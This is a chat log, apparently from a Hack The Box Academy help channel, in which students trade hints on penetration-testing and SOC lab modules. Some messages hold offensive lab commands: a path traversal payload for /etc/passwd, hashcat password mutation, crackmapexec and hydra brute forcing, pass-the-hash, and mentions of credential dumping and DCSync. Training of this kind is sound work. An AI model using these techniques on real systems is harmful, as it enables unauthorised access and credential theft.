#modules
Didn't ask you to, try running john with sudo
research on copy mode, thinks there is a video from ippsec about tmux 
Oh I only DM'ed you so I wouldn't provide any spoilers
Yeah Watched it, i'm not sure what's going on but i follow his commands and they still are not working. I installed the HTB's suggested plugins in the doc module, those keys don't really work for logging either. Not sure what i'm doing wrong
probably you change some default key, check the ~/.tmux.conf file and this website https://tmuxcheatsheet.com/
Can I dm someone about the ColdFusion - Discovery & Enumeration section of the Attacking Common Applications module? I’ve literally tried everything including checking port 5500 via netstat after getting a shell…
So in the guide, spacebar starts the selection of copy mode. but spacebar only goes down a page for me.
Such a bummer cuz tmux really interests me but the logging and copying are kinda the things i really like about it.
Does anyone know a solution to the "there are no available instances" error?
try with "ctrl + Spacebar", that should highlight the text, then "alt+w" to copy on clipboard and finally "ctrl+b+]" to paste the data.
Message support
00:17 - Why I like Tmux
01:20 - Creating Tmux Session
01:45 - Bash: Ctrl + R - Recursive Search
02:02 - Tmux: Prefix Key (default Ctrl+B)
02:05 - Tmux: New Window - Prefix c
02:07 - Tmux: Switch Window - Prefix #
02:36 - My Tmux Config
02:50 - Demo of "nested tmux"
04:00 - Tmux: Rename Window - Prefix ,
04:20 - Tmux: Send/Join Pane Prefix [s|j]
...
Already tried this
The ctrl space bar was kinda working. It looked like it was selecting, tried to copy and paste into obsidian but didn't work.
Thanks though
lol, you can not use copy mode on tmux to copy data inside tmux to programs outside tmux, like web browser, obsidian, notepad, etc.
Well then there's the problem lol
how does one take notes?
Open text editor, paste, save, copy from text file to obsidian
put this on your tmux config
set-option -g mouse off
then you should be able to use the mouse to copy paste
or run this inside a tmux session
tmux set-option -g mouse off
This works but again, I can't scroll up as i'm selecting so I can only copy what's in plain view
I have been going through the CDSA modules
Specially, section "Introduction To Splunk & SPL"
I got stuck in the last question of the section "Find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. "
I have tried multiple SPL queries. However, none has sufficed.
Can anyone refer to me a detailed documentation about SPL range() function usage on time or duration?!
Range is equal to max() - min()
Thanks @acoustic owl . But I have tried this reference. It is not elaborate enough. I am trying to use it in time.
Hypothetically, the first occurrence of an event plus a specified duration afterwards.
Exactly, so if you use range(_time), you have determined the duration between max(_time) and min(_time)
if you're using x11 and xclip, you can pipe the copy mode buffer into xclip clipboard, and if you're using vmware, it reads from the primary xclip clipboard, so if you pipe the buffer into both clipboards, you'll be able to sync tmux buffer with the clipboard of both your guest and host OS
for static data it can work. However, I wanted to compute the number of events from the first occurrence of the event by an account name and 5 minutes afterwards. The range shall pinpoint to any record that satisfies that selection and count it.
https://superuser.com/questions/537470/tmux-mouse-select-and-scroll-at-the-same-time
# Sane scrolling
set -g terminal-overrides 'xterm*:smcup@:rmcup@'
Yes, you can do exactly that
Hello
i am stuck in Threat hunting skills assessment First Hunt "i write the query and i found 2 hits" but the answer still wrong :\ any help please?
I will try then. A lot of thoughts are going through my head including using eval and then range(). Thanks pal.
Hi, Can you please be more specific or add more details about the section and related question and the ways you have tried?
Threat Hunting & Hunting With Elastic
can i share the query ?
I am not sure if that is allowed or not.
However, you can go through this reference https://attack.mitre.org/techniques/T1570/
Take a close look at the hint, it suggests the usage of a tool that starts with "r"
"Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol." From Mitre ATT&CK T1570
Cross-check that with "Procedure Examples" that follow
Hi there, anyone can help me with the Skills Assessment of "JavaScript Deobfuscation"? I'm stuck on question 3, I can see the contents of the variable flag but don't know how to stitch it together to get the right answer. Thank you guys in advance.
Throw it in a deobfuscator. If it doesn't work, throw it in another one. That's the entire idea behind that awful module.
got it, thank you!
.
You can't use this tool 'crackmapexec smb <ip> -u "user" -p "password" --shares' if there is no smb ports(135,445) on your remote target right?
For the Password attacks module, is it always better to just use mut_password.list over password.list as the default?(until explicitly stated otherwise)
Section:Attacking Common Applications
Module:Thick Client Application
"In order to capture the files, it is required to change the permissions of the Temp folder to disallow file deletions. To do this, we right-click the folder C:\Users\Matt\AppData\Local\Temp and under Properties -> Security -> Advanced -> cybervaca -> Disable inheritance -> Convert inherited permissions into explicit permissions on this object -> Edit -> Show advanced permissions, we deselect the Delete subfolders and files, and Delete checkboxes."
After starting a procmon, found this folder, trying to change security permission, but there is not this option, could anyone hint me?
The permissions are changed within file explorer : |
the temp folder
I'm on the same module, next section: Exploiting Web Vulnerabilities in Thick-Client Applications. Are we supposed to compile Invoker.java from traverse or fatty-client-new?
u can try watch a fatty box from ippsec, i think this the same application
dope, thank you
you doing okay with the folder permissions?
well i found where i can change permissions, but maybe im selecting a wrong principal?
principal looks good
i had trouble selecting the correct folder
in the previous screen shows the folder you're editing
dm's are open
i have dm'd u
Hello all,
Similar to my last post regarding Footprinting Easy; I am doing the Footprinting Medium lab, and I have gotten the flag but I wanted to see if there was anything I missed. After ||Mounting the NFS directory and finding Alex's credentials|| I tried to connect to both the ||SMTP server with TELNET & CIFS(SMB) || I wasn't able to connect to the first which I kind of figured because I didn't see the port open but when I used the cred for the other service it just seemed like a dead end. Was there another way to enumerate these services or did I pretty much cover all of my bases?
I only enumerated smb after mounting and used that to log in
I mounted the NFS share and was able to get some initial information from that I had just wanted to make sure that I didn't miss anything because SMB seemed like a dead end but another one of the open services gave me what I needed.
Smb was not a dead end for me
It had the important note
You can find that note another way
I actually found that ||Through the remote session||
Probably, just saying that I got it there
Yeah also possible
Did you use smbclient or rpcclient? If it's the former I might be using the wrong switches because I'm getting no information back, with the latter, I seemed to get blocked on every end.
First smbmap then smbclient
file inclusion prevention of file inclusion module i have edited php.ini file with a line to disable system() function then restart apache service then curl get request to the php file I made but when I check logs I don't seem to see any flag or what may be the answer it looks normal
can someone from admins may be check - is vulnerablesite.htb accessible from the bot side in Skills Assessment from ADVANCED XSS AND CSRF EXPLOITATION module?
so, i think something is broken. may be vulnerablesite.htb is not accessible for the bot
Hey, I have a problem with the modules section of Metasploit, when I try to exploit the vulnerabilities I get this error, I don't understand how to fix it
attacking common services idk how to enumerate the user
i checked out blogs i couldnt find any users
i tried bruteforcing on login page and couldnt find any user
You may need to read the module again to find out how it works
can you please tell me whether i need to bruteforce login page
or do i use wpscan
i also tried bruteforcing author id
i have no clue now help
use cme
if you use smb you have to create a smb share on your machine and use xcopy or robocopy
:(
If it is a Wordpress, wpscan is certainly the first choice
thanx you :)
why does manually bruteforcing author id doesnt work
idk
it says it found by id bruteforcing
but when i try with a python script i dont get it
Hello guys👋I'm new here and i'm Finnish😅But i speak English too
Oh, ok. Didn't see it at first. Going there. Thanks.
I'm having an issue getting the ZAP HUD to work correctly. I am not able to toggle on and off the break point. I have updated ZAP but it still doesn't work. I am working on the examples shown in the HTB academy - Web Proxy Module. Any help would be appreciated. It doesn't respond when I click on it.
I got the ssh password for b.gates, but keep getting this error, "Permission denied (publickey).", when attempting to ssh b.gates@x.x.x.x. Module: Login Brute Forcing. Page: Service Authentication Brute Forcing. Question: Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?
Looks like you need an rsa key, are other services open?
Try attacking another service then
You're sending too many lines. Bot is treating it as spam
not doubting you, but if the question is asking to SSH into the server surely you would go that route?
That's the last step, ssh says (publickey) in its denial
For some reason, I can't paste the nmap output. Some of the open ports are 19 chargen, 22 ssh, 25 smtp, 4240 vrml-multi-use, and a long list of other "unknown" ports
thanks
gotcha
Try smtp
hacking wordpress skill assesment
I don't get how should i change /etc/hosts so that the ip would be resolved, cause when i add inlanefreight.com it does not help at all, just confuses with the real publicly faced web https://www.inlanefreight.com/i
enumerate more
I had no luck with smtp so far. For example, I used telnet x.x.x.x 25;USER b.gates but got "Trying x.x.x.x ..." as the result. I also substituted USER, for VRFY and EXPN but was not able to connect. I'll be back later and will try connecting to ssh again. Thanks
AH got it, had an issue with my vpn. used two vpns
Yeah, I've had similar issues like that in the past. I tried switching the HTB vpn to tcp, udp. I've also played around with my non-htb vpn's protocol as well
You'll get the cubes after completing
Up to you dude
whatever works for you tbh ¯_(ツ)_/¯
If its any use to you I was on silver subscription doing the pentest pathway and I ran out of cubes and needed to bump them up
Yes, an annual subscription unlocks all modules without cubes. You will receive cubes for each module you complete. So after a year you will have collected a few cubes.
I've just switched to the annual sub for that reason of unlocking them all
actually in need of a hint. the web does not run wordpress, i am supposed to find another domain, but looked up the whole site and went through gobuster for hidden links, not yet successful
you said another domain
did you enumerate another domains under the one gave to you
just don't get how to find em
I'm doing the Getting Started Module: Public Exploits right now, and I've already answered the question and all, with some internet help
Just trying to rationalize how you were supposed to arrive at the solution
Question: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
After using nmap on the target (nmap -sV targetIP -Pn), I found that there's three ports open, none of which I could exploit via msfconsole or extract some context clues from. The three services I've identified were ssh, tcpwrapped, and tcpwrapped from ports 22, 554, and 7070 respectively
Afterwards, I opened the target site on a web browser and found it explicitly uses WP simple backup plugin, to which I exploited via msfconsole, and later got the flag as a result
Was this how you were supposed to go about this module? Was there any point of doing an nmap scan, when I could've just opened the site?
nmap then should detect the port 80
80 and 443 usually runs websites
latter is encrypted traffic the former no
Can someone help me terminate a machine? it says its runnning but nowhere can I stop it
hello there, anyone so kind to help me in the questions for the password attack module in the PtT from windows section they ask for the number or TGT, so what i did is using Rubeus i export all the tickets using the option dump, now the question is the only TGT tickets are the ones that have the krbtgt on the service field or there is other way to identify them?
Yes you're meant to exploit the plug in
I believe this one launches a public server not private
So you'd do http://ip:port
Anytime it's not a private IP assume web
the point is his nmap didn’t show 80
So was portscanning just not useful for trying to exploit this site?
And it was lucky that I happened upon a website (though intentional for this lesson) that was explicitly telling me what plugin it was using, which could be exploited?
Whenever given ip:port. Assume it's a web, and it's set up to give you the hint right away
you were not lucky
the module teaches you that its a website
It's not "luck" so to speak, it's just the way this exercise was set up
Oh, i thought Try to identify the services running on the server above called for doing a portscan
Eh it can be done by simply identifying that the ip is public
would any one mind point me in the right direction in order to find the credentials in Q5 on the Active Directory Skills Assessment Part 1 at all please. Its been doing my head in for the last couple of hours I just can't seem to find it
So using a username list and using a password list doesn't work? I asked the question in chatgpt and it said it was okay to use a username list or password list ...but I am not sure now.
Capital U and capital P
Can someone help me out, i can't terminate a machine, but the machine is not even running
so im rendered useless now I can't do a single activity
Because of a ghost machine
Message support
Module: attacking common services easy mysql. I have the username and password I just need some help logging in to MySQL
You have to do it from inside the machine
RDP
Oh wait nvm you can just do -u<username> -p<password> $ip
You can drop the @ domain from the username
Thanks I'll give it a go!
Hi, I am going through the Web Attacks module but Burp Suite and the web browser does not seem to be playing ball, on Burp Suite I can't use anything other than the get http method and in the browser it just seems to constantly be loading, tried this on the first 2 exercises but no luck whatsoever, anyone else experience this?
I have tried both my VM and the HTB Instance and still the same
@fathom pendant It worked thank you!
With intruder active you need to forward the request
Ok, do I need to send to Intruder or just have intruder active?
If intruder is active you just need to click forward or next on the burp interface
You must do file open and file delete
Thanks @fathom pendant
finally finished AD Enumeration & Attacks - Skills Assessment Part I. I do have a question remaining. At first i made a reverse tcp meterpreter shell and then I used evilwinrm, however all the tools did not want to connect to the DC to get the information I needed, when i did it through the webshell it worked. can someone explain why my first route did not work and my 2nd did.
You'd need to supply the exact commands and process you took as it could be as simple as a command issue etc. Put them in spoiler tags
|| i have made a meterpreter shell from which I obtained a hash for the administrator account. I then used evil winrm account admin:passthehash to enter the 1st machine. I tried minikatz which ended up in a loop showing minikatz: ; I tried rubeus to obtain information, constantly getting errors that it could not find the Domain. I tried powerview to do it manually, same results only getting connection errors. After this I thought it was the machine I was working on so I made a proxychain to go to the 172.16.6.1 network and connected to the 50 machine with the same admin:hash combination, this connection was far too unstable to even do something apart from dumping lsass.
Then I used the webshell to run rubeus and suddenly all the answers were shown and no connection issues. ||
Is anyone here doing the SOC Analyst job role path?
I'm stuck on a module section and would love a bit of assistance
Finally got it! ssh b.gates@x.x.x.x -pport_number_of_htb_target. Thanks
It's regarding SilkETW - is it supposed to terminate on its own after it had collected all of the traces? Mine has been running for at least 20 minutes and has currently captured 1628, but it does keep incrementally going up. I'm assuming this is what's keeping the etw.json file from having the method name I'm looking for.
@wraith spoke do you mind if I DM you about part 1 at all?
Hello, I'm currently on Nmap enumeration Medium lab, and I have to find the DNS server version, but I have little to no clue how to go about finding that. I tried all of the DNS resolution options and I think I'm missing something crucial. Would anyone be kind enough to either walk me through how to figure it out or help me?
Any recommended modules on HTB Academy to prep for CEH.
Finished the Footprinting module!
Did you figure out this challenge? I am stuck on the same challenge. I am not even sure if I am interpreting the question correctly.
i was doing Local File Inclusion (LFI) module
and idky but cmds are not working
any help?
Yeah I eventually did.. you have to do some tracing back and understanding child-parent processes
hello, wym cmds are not working ?
have you tried this one : ../../../etc/passwd ?
yeps, didnt work
Hi, I am stuck at question 3 of CDSA Introduction To Splunk & SPL. I have tried using range() function with time. I have converted to epoch time and added 10 minutes to get the range.
try adding more "../"
However, it has not sufficed yet
ugh, worked. thankyou
The standard is using like 5 ../
you welcome !
have fun this course is quite hard for a beginner but don't give up !
thankyou
noted
Hello everyone!
Please I need some help
I've been struggling with a command in this module
#Module: Linux File Transfer Methods
It's about the scp command
I already have ssh running on my local machine
But in the remote machine I fail with this command
And on my local machine it works
Btw the passwd is correct when I write it but it says that is wrong 😦
index="main" sourcetype="WinEventLog:Security" EventCode=4624
| eval startTime=_time
| eval endTime=startTime+600
| stats count by startTime, endTime, Account_Name
| stats range(endTime, startTime) by count, Account_Name
can anyone help?!
0.0.0.0
you're scp into the wrong system
You should be doing your username@tun0ip also the order goes source -> destination so if you're copying from the target you would do that local file to your destination file
It may not be that issue though. After doing the Seatbelt attack, my Sysmon doesn’t show any event 7s (I did change the ImageLoad to “exclude” in the XML). I’ve been stuck in this section (Tapping into ETW, Windows Event Logs mini module) since last night and I don’t know what I’m doing wrong
How long did it take any of yall to complete the password attack path?
~5 hours give or take
Five hours without stopping?
For the credential hunting in Linux section, there doesn't seem to be a way to access the lab machine. How does initial access work? The windows version had RDP creds.
First find another user and password combination: then look for will using the specified tool
There's no initial creds though to start the lab.
Read the first few words of my reply
That's the important bit, use the resources from the resources.zip the module gives you
And the mutated password list
So brute force with SSH using these?
I'm confused
hi how u solve this ?
Bruteforce a different service
Ssh is end goal not start
If you Nmap the target you'll see multiple ports open, don't just assume ONLY ssh is open, as the tools provided by the module are slow at bruteforcing ssh and will literally take hours
yeah, that's way too long
SMB didn't work though
The lab isn't compatible with V1
So that leaves FTP, which I'll try, but I'm not sure because it wasn't covered in the network services portion. I'm just trying hydra with it anyway.
Well if you ran an Nmap scan you'd know what ports are open
am I on the right track with ftp though? That's the last port from my nmap scan besides the ones I've tried
I just want to make sure I'm on the right track before I waste an hour. I'll keep reading ahead while that runs I guess.
Thank you for the clarification.
It didn't say anything about initial creds so I was confused given the windows version of this module supplied RDP creds.
Sometimes in an engagement you aren't given initial creds
Also this module reuses the same labs so you can definitely narrow your search down quickly if you do some quick enumeration techniques after one of the earlier sections
Okay, so I tried FTP and SSH with the information supplied in the hint and have still found 0 valid passwords with Hydra. I feel like I'm spinning my wheels.
gonna say skill issue on this one
Just found it, I put the hint username in lowercase too and tried again.
Yeah, I was looking at the hint and didn't think about that when I was putting it in a wordlist as the only word for usernames.list
Then I named it the username in the hint in lowercase .list, lol
I'd suggest taking a look at /home/ so you can get a username list for the Linux machines 😉
Turns out I had just done the password list in my first try with FTP and 64 threads. When I tried the mutated list this is what I got
Same methodology for the Windows C:\users\
That was FTP
That's weird. Sounds like connection fuckiness
What's it supposed to be, like 20 min?
<1hr
Yeah, glad I used the clue, that's excessive just to start a lab
I appreciate all of your help!
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
from the "resources"
mutated password list using the password list and custom ruleset from the resources in the lesson
Yeah I realize now, clue < 10 min, while no clue = 188 hours, lol

They should just give that as a standard, not a clue.
It's a lesson in engagement
One of the ways to narrow down the list is log in as Sam and check /home/ for other usernames
Also SAVE all passwords you find :)
So that's what you're saying in terms of enumeration from previous lessons?
I didn't realize the sessions were linked, the last one I did was windows.
Yes the windows sessions are linked. And the Linux sessions are linked
what module: FOOTPRINTING
which part: IPMI
Question: I got the hash for the password of the user finally, but I was stuck for a while when I used the ?1?1?1?1?1?1?1?1, can someone please answer how do we know when is the time to use it? Thanks
Don't use that mask
That mask is for a specific ipmi type
thanks @fathom pendant . i got the flag but i want to know when is the time to use it. i didnt understand from the module content on when to use.
The module explicitly tells you the conditions to use it
"In the event of an HP iLO using default password"
got it. so from the msfconsole output would you be able to identify if it was HP iLO to then crack it?
Yes
hi im stuck on Windows privilege escalation section SeDebugPrivilege
i try psgetsys.ps1 but get error
Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are
assigned to the caller"
any hint to solve this issue ?
Hello Peeps, I am right now at footprinting - lab easy, is about information gathering and stuff, and it's hinted that with this info I should find how to access the server via ssh, so far I believe I downloaded the correct files from the FTP server, but I don't know what do to with this 🤣
I just wanna know a hint of what are supposed to be the next steps.
reacone
It does not look like you have found the right files. Either you didn't show them in the screenshot, or you haven't found them yet.
Hello guys! I am in Password Attacks - Credential Hunting in Windows content
Try to use FindStr /SIM /C: "PASS" *.txt *.ini *.cfg *.config *.xml *.git *.s1 *.yml and Start Lazagne.exe all command
No problem was found: What is the default password of every needed inlanefreight domain user account?
Am I on the right path? Please give me some tips
hey guys can you plz help me with footprinting module - footprinting medium lab .. i have already found administrator creds but not able to get the flag plz guide me a little
Mssql
Send screenshots
can i dm you once i have acess to my laptop
You can just send pics here
ok sure
And you’re admin?
yes
yes
I just rdp to administrator with the creds found, then opened mssql, had no issues
i dont know first it was throwing error when i rdp with xfreerdp so i tried with remmina and now when i connect to mssql it is giving me this error
Not for me
and also i tried with mssqlclient.py it throws me the error 111 and refused connection
Are you the user administrator?
yes i am
i login as the alex and now gained admin creds in a file
Reset the box perhaps
After you reset just rdp to administrator with the pass from the important file
And try opening mssql again
already did it couple of times .. is it a technical issue or am i doing something wrong
okay thanks for your time mate

i cant even connect with rdesktop or xfreerdp for user alex in footprinting medium
keep getting error
[04:53:23:233] [305625:305626] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[04:53:23:233] [305625:305626] [WARN][com.freerdp.crypto] - CN = WINMEDIUM
@south glen i was able to re-create your issue, if this what you do change the Authentication back to Windows Authentication
you may want to put that username in spoiler tag and try this (with the single quote for the pass)
xfreerdp /cert:ignore /dynamic-resolution /v:IP /u:(username) /p:'(password)'
hint powershell (and maybe you don't add users 1 by 1 as a sys admin)
Hi, Anyone recently completed Attacking Enterprise module? On the Web section where I need to get the flag from gitlab, I'm not able to get the site even when adding entry into my /etc/hosts , nothing works, if I use other ports then it redirects to other subdomain
Hello
I have a problem with this exercise
When I run my program I do not have access to my payload
can you help me? please
as much for me I have access with the pwn machine but not with my personal machine
Hello there, im trying to connect from windows to my linux(smbserver.py) i have configured everything, but when trying to net use there is an error
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
does anyone know how to bypass it?
Hi in the password mutation section of password attack module I am stuck in the mutated password list I generated a password list with the custom rule and password.list provided in the section but it takes a lot of time and even then I am not getting any answers. am I doing something wrong if so please nudge me in the right direction
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
The commands I used are
To generate a password list I did
hashcat --force password.list -r custom.rule | sort -u > mut_pass.list
for the attack I used crackmapexec
crackmapexec ssh 10.129.x.x -u sam -p mut_pass.list
can someone suggest wordlist for this pls, i tried metasploit dont but it didnt get any hits
Yup, that module loves wasting your time. But you can speed it up by doing enumeration and trying to attack different services. Some are faster than others. Also play around with the tasks flag -t.
try hydra instead of metasploit
btw there is a ftp server
yes
i need wordlist
(sorry, that flag was for hydra, not crackmapexec)
i even tried writing my own script
it tries to log in correct but the wordlist is not right
ok I will try ftp on it
:c
any idea how to only display the valid cred on crackmapexec?
save output to a file and grep +
ok
--export file.name is the flag right?
yeap
i need wordlist :c
rockyou and darkweb2017 should come with kali
what module is that?
the password is not in the wordlist you used, use a bigger wordlist
how about usernames
use the same wordlists as the example
okay thanks i will give it a try
can you tell the wordlist pls i tried with various ones but my internet is bad and i cant hit one
same as the ones used in the example
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
but that didnt hit
understand the material and use some analytical thinking
can you please elaborate
it says to bruteforce on manager so im bruteforcing /manager/html
did i mistake anything
@quick crane you dont even have to output to a file you can just pipe straight into grep crackmapexec <command> | grep +
Hello there, im trying to connect from windows to my linux(smbserver.py) i have configured everything, but when trying to net use there is an error
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
does anyone know how to bypass it?
im still stuck it in ow
use credentials
hi everyone! i'm stuck in the "Shellcoding tools" chapter of the Intro to assembly language module. I've no idea where to go in the Q. The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the server with "nc SERVER_IP PORT" to send the shellcode.... Furthermore... In the examples brought in the text, always sets the root after a shellcode, but in my case, just my user (htb-studentxx). Any guidance? any help, please!!!! Thxs!!!!
The module explains exactly what you need to do.
use one of the tools in the exercise to generate a shellcode to get the flag, then send it using nc. not sure what you're referring to in the last part
i tried everything i can 😭
i tried metasploit, given script, my own script on different endpoints /manager/html, /host-manager/html
nothing works
Restart the target and do exactly 1:1 what is explained in the module.
Module:Attack Common Application
Section:Exploiting Web Vulnerabilities in Thick-Client Applications
Trying to complete this section, done everything until downloading a fatty-server.jar, while editing an Invoker.java there was always a compiling error just because of some stupid things (i cannot edit this properly bcs there is no code editor or something like this), after that thought to upload a ligolo-ng and download a fatty-server and do it through vscode on my local machine, but i cannot even upload it (tried curl, wget, certutil, smbserver, also tried evil-winrm but it just froze) also rdp is always crashing, has anybody done this section? i need some help
NOTE:i cant change code though notepad bcs of this things /* */ in java
how did you do tomcat
just did everything that was in module, that wasnt hard
DM me if u want
you can mount a drive when connecting to rdp, check here https://manpages.ubuntu.com/manpages/focal/man1/xfreerdp.1.html if your rdp keeps crashing, switch your vpn to tcp
I tried it but I am getting some log error
thank you
the box is broken, i got answer and when i tried the same with burp it failed but when i try again it logged in
is there some mechanism to block if i send too many requests ? or is the box just broken
I have no idea.
Back then, I did exactly what was written in the module and was able to answer the question without any problems.
That's why I also said restart the target
thankyou so much for your time you have been a great help mate .. 🙂
too vague, provide more information.
Module Introduction to Forensics
Section Rapid Triage Examination & Analysis Tools
Hello, I'm stuck with the last question of the section. I think I have identified the right process but I can't find his name
What have you already tried?
I found it, I always go too far 
Doing Windows Priv Esc - Pillaging. Question" Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer". It will not accept the Administrator hash in any given format. Anyone had similar issues? Nevermind. EDIT!!! What a detrimental exercise embedding more backups with multiple versions of the needed files........
Module:Attacking Common Applications
Section:Exploiting Web Vulnerabilities in Thick-Client Applications
Cant understand, did the same thing but there is an error, does anyone know something?
i dont know java at all 
Look up walk-through for a box called fatty
he is doing from eclipse, but this is too long, but yeah it the only way i think
did you make sure to carry over the changes from the previous manipulation? I dont remember which step this is but I remember I had a lot of trouble on one because I used the base fatty-client and didnt carry over the initial modification when I did another step - nvm didnt read your error clearly sorry
Hello when I try to recover the files, error access not denied, what should I do ? Please
Set it up with a username/password
Windows doesn't play well with unauth stuff
Also specify a filename in your move command
Hey guys I'm stuck on "Windows Privilege Escalation" ==>> "Other Files"
I'm trying to get Import-Module .\PSSQLite.psd1
but I get a message I can't do it does anybody have an idea what's the problem ??
am I on the right track??
C:\tools
yes ...
I know I get an error message ...
it's Import-Module .\PSSQLite.psd1
I mean this suppose to B the way, no?!
Hello everyone! Sorry if I'm off-topic.I want to gift two specific Modules as a present for a birthday. Is it possible to give modules as gift instead of a voucher of cubes?
No
so sad T_T
is it not the correct way??
what's the error you're getting?
"Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Tools\PSSQLite\PSSQLite.psm1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"):"
did you bypass execution policy
when I try to run the bypass it gives me an error
what's the error
Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by a
policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution
policy of Unrestricted. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more information
please see "Get-Help Set-ExecutionPolicy".
Are you running powershell as admin?
Gift them a .edu email /s
hi
I can't run it as admin...
Anyone done Active Directory Enumeration and Attack recently?
I need a hand on the last 2 question of Skill assessment 2
you shouldn't need admin privs for the process scope, use the bypass command as per the exercise, if it doesn't work, reset the target and try again
by "use the bypass command as per the exercise" that U mean ||Set-ExecutionPolicy Bypass -Scope Process|| right?
yes
it's a sqlite db, you can also use strings or the sqlite3 client, or just cat it
yes but it need to B so simple
but it doesn't work driving me mad ...
maybe it's got 2 do with me location??
I don't know what els to do ...
I don't get what you mean, there are multiple ways to read a sqlite db other than using that powershell module
I need a hand with Active Directory Enumeration and Attack Skill Assessment 2, Question 11.
I have used Bloodhound and can see that the user C*** has ||Generic All over Domain Admins, which has Generic All over DC01|| When I try to use mimikatz as C* on MS01 I can't enter the password as it skips over the password prompt.
Am I doing something wrong here?
Ask the actual question and say what you've done,put spoilers in spoilers tags. You will be more likely to get help that way.
I have tried with a netcat shell, but it results in the same thing
And trying to do a ||DCSync|| with powerview just fails with
at the first step
What's the exact question
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I cant seem to connect to DC01 or MS01 with the creds I found in the previous question...
Try a different session
Maybe search "session" on the modules pages to refresh your memory
In the Active Directory module or another one? I havent found anything yet 😕
I'm doing Footprinting Lab - Hard || I was able to find Tom's credentials, and SSH key using IMAP, and then SSH into the NIXHARD server|| from there I keep finding the hidden directories and subdirectories but nothing that's pointing me towards where I should go next. Can anyone provide a hint for the next step because I feel like I've hit a wall.
Check some of Tom's home files.
Still stuck🙁
Did you perhaps hint to ||Enter-PSSession|| ?
I’ve found the flag.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Do you guys prefer using the HTB virtual terminal or your own terminal?
if you got free plan use your own terminal
free plan?
i mean did you buy premium plan
Yeah copying and pasting content from the resources section to the clipboard is starting to annoy me . Thats why I ask
I am on the silvers plan
thats rank i guess
i mean do you pay any cash monthly into hackthebox
I prefer my own terminal and my own box, learning how to manage and control your machine is a good skill 🙂
oh yeah thats true
I already paid the annual payment to hackthebox academy and pay 20 dollars per month for just hack the box
hmm i see
You use oracle vm?
Managed to authenticate to ms01 as C** so I think that is progress
I am stuck still in the password mutation section.
I tried enumerating the smb service with rpcclient for users from which I got user ||sam||
I then used that same user and used bruteforce with
crackmapexec ftp 10.129.x.x -u ||sam|| -p mutated.list | grep +
got nothing I even tried smb option in crackmapexec and then I tried combining both the passwor.list and user.list into 1 list and then mutating password with hashcat and then bruteforcing both the ftp and the smb services. please I need help for my sanity
I use the base parrot instance and then just add things I use commonly and customize it to how I like it
ippsec has a good video about his vm and is a good place to start
I use pwnbox as my current location from the servers is far so footprinting takes more than 1hr for full scans
am i verified
not yet
how do i can see that
any help with this I am stuck on this stupid question
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
your username will be the same color as mine. To verify yourself you need to go to botcommands and type /verify
what tool are you going to use for brute force
oh
Tried both hydra and crackmapexec
did you get wordlist ?
also you know its case sensitive same as password and username
yes from the resources mutated it then using hashcat
hmm
username is mentioned in the question and just to be sure I found out user sam(mentioned in the question) using rpcclient
I have my notes from that module up which section was it shade
hmm
Module password attacks
section Password mutations
o i think this was right b4 I started screenshotting the exercise question and answer rip
uh i remember the forums being very helpful for this
and that this section was easily the most annoying of the 28 cpts modules lol
yes I am feeling it now stuck on it for 3 days I tried looking into the forums they said to enum ftp and I did just that
I am just sad at this point
Can anyone help me in mounting xxxxxxx.vhd file ? from the password attacks hard lab i tried this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 but did not work for me i receive this error https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 and i did not find any resource about it
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Hey guys I'm stuck on "Windows Privilege Escalation" ==>> "Other Files"
trying to read the "plum.sqlite" according to the model but I can't make the "Set-ExecutionPolicy Bypass -Scope Process" command
any hints please ??
I've been stuck on this for too long ....
nmap scan is a whole lot slower on the virtual machines I noticed
I just did this one, the module tells you how to do it
@umbral fulcrum
like I did verbatim what the module said and it worked
that's the thing I'm doing it as the module says but I get error messages. ...
is the error message you get that the scope is already unrestricted
I think we can post screens in here or you can dm me if you want
thxs!!
Anyone experience this issue when running the crackmapexec on their own machine?
nope
Anyone have issues with not being able to log in chat gpt in their virtual terminal?
i got two virtual machine connected into same network and i use NAT so how do i can make contact with one virtual machine to two virtual machine
i mean with webserver localhost/127.0.0.1
hello...everyone
oh my bad thanks
Working on passwd, shadow and opasswd module and cant complete due to the following
I can only access the /etc/passwd file
the ones I need are not accessible without root
Yeah, I found the hidden stuff, thanks, just took me a minute
I was trying to follow the lesson, had to get creative instead
always and creative = funnier
